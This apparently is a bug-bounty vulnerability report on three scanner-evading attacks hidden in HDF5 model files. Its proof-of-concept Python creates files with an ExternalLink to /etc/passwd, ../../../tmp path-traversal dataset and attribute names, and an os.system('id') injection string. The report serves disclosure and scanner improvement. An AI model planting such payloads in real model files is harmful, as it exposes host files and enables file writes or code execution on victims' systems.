HDF5: External Link File Read + Path Traversal + Attribute Injection
Summary
Three non-pickle attack classes against the HDF5 model file format (.h5, .hdf5) that bypass both picklescan 1.0.4 and modelscan 0.8.8 (3/3 MISSED by both):
- External link β arbitrary file read β HDF5 ExternalLink objects reference files on the host filesystem. When accessed, h5py opens the linked file. A malicious model with
ExternalLink("/etc/passwd", "/")reads host files. - Path traversal in dataset names β Dataset paths like
../../../tmp/evilare accepted and preserved in the HDF5 virtual filesystem. Tools that extract datasets to disk write outside the target directory. - Code injection in attributes β Attribute names and values accept arbitrary strings including Python code and path traversal characters. Downstream tools that eval attributes or use attribute names as paths are vulnerable.
Format: HDF5 ($1,500 MFV) Scanners tested: picklescan 1.0.4 + modelscan 0.8.8 β 3/3 MISSED by both
Payloads
| File | Attack | Impact | picklescan | modelscan |
|---|---|---|---|---|
hdf5_external_link.h5 |
ExternalLink("/etc/passwd", "/") |
Arbitrary file read when link is accessed | MISSED | MISSED |
hdf5_traversal.h5 |
Dataset path ../../../tmp/pwned |
File write on dataset extraction | MISSED | MISSED |
hdf5_attr_injection.h5 |
Code in attribute value + traversal in attribute name | Injection if attrs are evaluated or used as paths | MISSED | MISSED |
Vulnerability Details
External Link β File Read (CWE-22)
HDF5 supports external links that reference other files. When a dataset accessed via an external link is read, h5py opens the referenced file from the host filesystem:
import h5py, numpy as np
# Create malicious model
with h5py.File("evil_model.h5", 'w') as f:
f.create_dataset("weights", data=np.random.randn(10, 10))
f["secret_data"] = h5py.ExternalLink("/etc/passwd", "/")
# Victim loads model and iterates datasets:
with h5py.File("evil_model.h5", 'r') as f:
for key in f.keys():
data = f[key] # accessing "secret_data" opens /etc/passwd
In ML pipelines, models are loaded from untrusted sources (Hugging Face Hub, shared storage). The external link is embedded in the HDF5 file itself β no user interaction beyond loading.
Path Traversal in Dataset Names (CWE-22)
HDF5's virtual filesystem accepts path traversal in group/dataset names:
with h5py.File("model.h5", 'w') as f:
f.create_dataset("../../../tmp/pwned", data=np.array([1.0]))
The .. component navigates up in the HDF5 group hierarchy. While h5py resolves this internally, tools that map HDF5 paths to filesystem paths during extraction are vulnerable.
Attribute Injection (CWE-94)
Attribute names and values are unrestricted:
with h5py.File("model.h5", 'w') as f:
ds = f.create_dataset("weights", data=np.random.randn(10, 10))
ds.attrs["../../../tmp/evil"] = "traversal in attr name"
ds.attrs["description"] = '__import__("os").system("id")'
Verified: both attribute names with path traversal and values with Python code are preserved verbatim. Tools that:
- Use attribute names as file paths (export tools)
- Render attribute values in web UIs (model registries)
- Pass attribute values to template engines or eval()
are vulnerable to injection.
Proof of Concept
import h5py, numpy as np
# Payload 1: External link
with h5py.File("hdf5_external_link.h5", 'w') as f:
f.create_dataset("weights", data=np.random.randn(10, 10))
f["secret"] = h5py.ExternalLink("/etc/passwd", "/")
# Payload 2: Path traversal
with h5py.File("hdf5_traversal.h5", 'w') as f:
f.create_dataset("../../../tmp/pwned", data=np.array([1.0, 2.0]))
f.create_dataset("normal_weights", data=np.random.randn(10, 10))
# Payload 3: Attribute injection
with h5py.File("hdf5_attr_injection.h5", 'w') as f:
ds = f.create_dataset("weights", data=np.random.randn(10, 10))
ds.attrs["../../../tmp/evil"] = "traversal in attr name"
ds.attrs["description"] = '__import__("os").system("id")'